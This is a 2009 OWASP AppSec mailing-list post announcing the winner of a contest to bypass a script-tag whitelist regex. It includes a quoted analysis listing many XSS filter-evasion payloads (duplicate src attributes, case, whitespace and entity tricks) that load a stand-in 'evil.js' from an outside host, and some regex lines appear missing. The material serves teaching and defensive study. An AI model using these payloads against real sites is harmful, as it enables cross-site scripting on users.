[Appsec_eu_2010] Winner of Challenge 1

John Wilander john.wilander at owasp.org
Tue Jul 21 13:49:49 EDT 2009

Dear Challenge 1 contenders and all others interested in AppSec Research
2010 (cc OC),

[Sorry if some of you get two copies. We wanted to be sure you all get

There were a lot of submissions to June's challenge, and many of you had
really worked hard to turn our poor little regexp into something else
entirely. Many of you pointed out that <script>-tags cannot be
self-enclosed, but must have a closing tag. We stand corrected. We were
however lenient when judging submissions, so both variants were ok. It
turned out there were four generally preferred attacks. They were, in order
of popularity :

* Double (or, multiple) src-attributes: 17 submissions
Example: <script src='foo' src='bar' />
This attack is a bit up to browser implementation which one will be loaded,
but empirically it has proven to be the first one that is loaded.

* Invalid attribute: 10 submissions :
Example: <script asrc='foo' src='bar' />
This attack is a bit more refined than the one above. It uses the browsers
rule for compatibility : skip what you don't understand and do what you can
with what you've got. Attributes not understood are discarded, which is what
happens to the what on the serverside is intended src-attribute.

* Several script tags: 7 submissions
Example: <script src='foo'/><script src='bar'/>
This attack was directed only at the regexp, which lets this pass. However,
surrounding control flow may stop this, which is hinted in in the
description "whenever a piece of code containing "<script..." is encountered
[...]", where we intentionally let that part remain dim.

* Html comment block: 4 submissions
Example: <script <!-- src='foo' --> src='foo />
This attack, though ostensibly fine, did not work in Firefox. It seems FF
does not allow comment-block inside tags, and therefore discards the entire

* Other: 5 submissions
There were several attacks here. One that surprised me was that commenting
by javascript standard worked well in html context; the attack vector
<script /*src='foo'*/  src='bar'/> worked fine (as opposed to <!-- -->). A
few of you relied on variations of CaSe, since the regexp was not specified
as case sensitive. The most overkill solution that one person came up with:
The period signs were not escaped, which meant that someone could acquire
the domain name scriptsoyahoogle.com to get it through the regexp! Alas,
probably not the whitelist :(.

We will not publish any resulting 'safe' variant of the regexp. As many of
you pointed out, the described overall solution is very precarious and
creating the perfect regexp is extremely difficult.

*The winner of Challenge 1 is Patrik Nordlén*, who posted a
'double-src-attributes'-solution early Monday morning. His modified regexp
(remember: we only asked you to fix *your* attack, not all possible flaws)
required whitespace between <script and src. Patrik, you'll receive a
separate email with your price ticket.

Once again, thanks for the contributions! *See you in the next challenge,
posted on the wiki very soon* ;).

   Regards, Martin, John, and the rest of the OC

*Honorable mention goes to Achim Hoffmann*, author of EnDe. EnDe is "an
Encoder, Decoder, Converter, Calculator, TU WAS DU WILLST .. [1] for various
codings used in the wild wide web)"  (http://ende.my-stp.net/ ). Achim
posted the following analysis of the challenge and the problems you face
with these kind of solutions:

*** Start of Achim Hoffmann's analysis ***

Here is a more detailed description of some attacks and countermeasures.

try { First attack patterns against the posted RegEx:

 1) <SCRIPT src="http://insecure.com/evil.js" />
    <SCRIPT SRC="http://insecure.com/evil.js" />
    <sCript src="http://insecure.com/evil.js" />

 2) (same as above but with a pattern for the whitelist)
    <SCRIPT src="http://insecure.com/evil.js" src='
http://secure.yahoogle.com/scripts/42.js' />
     (some more with SRC or Script or sCript or ...)

 3) <sCript src="http://insecure.com/evil.js" src='
HTTP://secure.yahoogle.com/scripts/42.js' />
    <sCript src="http://insecure.com/evil.js" src='
http://secure.yaHOOgle.com/scripts/42.js' />

 4) <sCr\tipt src="http://insecure.com/evil.js" src='
http://secure.yahoogle.com/scripts/42.js' />

 5) <sCript src="http://insecure.com/evil.js" src = '
http://secure.yahoogle.com/scripts/42.js' />

 6) <sCript src="http://insecure.com/evil.js" src = '
http://secure.yahoogle.com&#x2f;scripts/42.js' />
    <sCript src="http://insecure.com/evil.js" src = '
http://secure.yahoogle.com&#47;scripts/42.js' />

 7) <sCript src="http://insecure.com/evil.js" src = '
http://secure.yahoogle.com&%2f;scripts/42.js' />
    <sCript src="http://insecure.com/evil.js" src = '
http://secure.yahoogle.com&%02f;scripts/42.js' />
    <sCript src="http://insecure.com/evil.js" src = '
http://secure.yahoogle.com&%002f;scripts/42.js' />
    <sCript src="http://insecure.com/evil.js" src = '
http://secure.yahoogle.com&%0002f;scripts/42.js' />
    (and some more ...)

 8) <sCript src="http://insecure.com/evil.js" title="src = '
http://secure.yahoogle.com&/scripts/42.js'" />

 9) <sCript src="http://insecure.com/evil.js" /><script src='
http://secure.yahoogle.com/scripts/42.js' />

10) Looking at 9), we also can use a script tag which does not use a src=
    attribute but native javascript code. In that case I'd load the external
    .js file using XMLHttpRequest() and using eval().

11) What about using https instead of http?

12) <sCript src="http://insecure.com/evil.js" type="text/javascript" src='
http://secure.yahoogle.com/scripts/42.js' src="http://insecure.com/evil.js"

 *) keep in mind that each of above is just one example out of countless,
    and even that they all can be mixed as you like


catch { Second explanation and possible RegEx:

 1) I'm unsure if this matches the requirements of the challenge because
    it depends on the programatically interpretation of the matches.
    For a solution see 2) below

 2) This one simply attacks the missing case senitivity. The RegEx could
    be improved like:


 3) You have to think about values also, not only tags:


    As this is still not sufficient, you have to make the FQDN also
    (I'll avoid the example for that 'cause it can be a simple i modifier
     on the used RegEx engine)

 4) Here \t means a real TAB (hex 0x09) character. It depends on the target
    browser if such a payload is rendered (IE will:). Instead of \t you also
    may use \r or \n or \f or any combination of these.
    This sitiation can not easily be matched with a RegEx as you cannot use
    the \s meta character (which includes spaces which will break the tag).
    Hence you need (?:[\t\n\r\f]*) right behind each character of the tag
    and behind each character of the attribute names.
    Here is just an excerpt of such an RegEx (not complet according the
    I'm not sure (means never tested iot) if \t and alike are also valid
    behind the opening <.
    BUT that's not enough also, as we have a ton of other Unicode characters
    which will be silently used by some browsers (just think of halfwidth
    fullwidth, or %c2%0d where IE and/or IIS silently ignore the high bits).

 5) Another one which depends on the target browser: spaces around the tag
    attributes =
    In this case we can use \s meta character:


  6) Using HTML Entities in the URL. You better don't use a regex for that
     (except you are prepared for a some-k-byte RegEx;-)

  7) Using URL-encoding in the URL. Can be done with RegEx in some engines
     only (for example perl's RegEx), hence I omit a solution for that.

  8) How about embedding the required whitelist into another tag? I'm unsure
     if this can be matched with RegEx, at least not with simple engines

  9) Close the script tag and open again. This needs a prgrammatically check
     of the captured groups.

 10) RegEx is impossible for that.

 11) Allowing https is simple:


 12) In my suggestion yesterday I said that the attack may depend on the
     browser (because of the used src= attribute). If we assume that a
     either reads just the forst src= attribute, or reads all attributes and
     the last wins, we have a more universal pattern here.
     Also as explained yesterday, this is hard (if not impossible) to detect
     with a RegEx.

finally {
 All in all, I'd assume that there is no RegEx-only solution for the
 You always need a RegEx, probably more than one, and a corresponding code
 which checks the captured groups. That would result in a huge RegEx (more
 ugly depending on the RegEx engine) and a cumbersome code to check the

 For a simple clean "Input Validation" I'd use following (with a

 Then discard all data not matching that RegEx completely. This means that
 you need to tell the user that only script tags like
<script +src='http://secure.yahoogle.com/scripts/whatever.js' .... >
 Means in words:
opening <script tag
followed by at least one space
followed by src= attribute (no spaces allowed here)
followed by URL enclosed in single quotes

 KISS - keep it simple stupid.


  I'd slighly disagree with Jamie Zawinski cite. It should be expanded to:
    Some people, when confronted with a problem, think "I know, I'll use
    regular expressions." Now they have *more* problems.

I'm pretty sure that these are not all attack patterns for this challenge.

*** End of Achim Hoffmann's analysis ***
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/appsec_eu_2010/attachments/20090721/889b8ec1/attachment.html 

More information about the Appsec_eu_2010 mailing list